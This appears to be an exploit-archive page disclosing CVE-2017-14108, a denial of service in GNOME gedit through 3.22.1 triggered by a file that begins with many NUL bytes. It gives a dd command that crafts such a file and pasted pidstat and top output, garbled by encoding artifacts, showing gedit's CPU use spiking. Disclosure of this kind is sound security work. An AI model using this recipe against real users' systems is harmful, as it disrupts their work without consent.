libgedit.a 3.22.1 Denial Of Service

libgedit.a 3.22.1 Denial Of Service: Posted Sep 4, 2017; Authored by Hosein Askari; libgedit.a versions 3.22.1 and below suffer from a denial of service vulnerability.; tags | exploit, denial of service; advisories | CVE-2017-14108; SHA-256 | cac7e3249daa80e7e6c5fee8123d3bb7156fe3aed36f5446e5a5caf356d6d9ac; Download | Favorite | View

libgedit.a 3.22.1 Denial Of Service


whom it may concern,
################

#Title: libgedit.a mishandeling NUL blocks in gedit(GNOME text editor) | Denial of service

#CVE: CVE-2017-14108

#CWE: CWE-400

#Exploit Author: Hosein Askari 

#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit

#Version : All Version (3.22.1 and older version)

#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)

#Date: 02-09-2017

#Category: Application

#Author Mail : hosein.askari@aol.com

#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) for a longtime via a file(less than 100KB) that begins with many '\0' characters.

###############

#sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt

#################

POC:

constantine@constantine:~$ pidstat -h -r -u -v -p 3107

Linux 4.4.0-93-generic (constantine) A A A  U+-U*/UdegU1/UdegU+- A A A  _i686_A A A  (2 CPU)

#A A A A A  TimeA A  UIDA A A A A A  PIDA A A  %usr %systemA  %guestA A  %waitA A A  %CPUA A  CPUA  minflt/sA  majflt/sA A A A  VSZA A A A  RSSA A  %MEM threadsA A  fd-nrA  Command

A 1504280041A  1000A A A A A  3107A A  16.43A A A  0.01A A A  0.00A A A  0.03A A  106.44A A A A  1A A A A  15.53A A A A A  0.00A  121296A A  38804A A  0.95A A A A A A  4A A A A A  18A  gedit

constantine@constantine:~$ top

A  PID USERA A A A A  PRA  NIA A A  VIRTA A A  RESA A A  SHR SA  %CPU %MEMA A A A  TIME+ COMMANDA A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A  

A 3107 constan+A  20A A  0A  128884A  38492A  28320 R 106.7A  0.9A A  0:17.76 gedit 

#########################
Best Regards

Hosein Askari

Contact : hosein.askari@aol.com

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

libgedit.a 3.22.1 Denial Of Service

libgedit.a 3.22.1 Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

libgedit.a 3.22.1 Denial Of Service

Share This

libgedit.a 3.22.1 Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems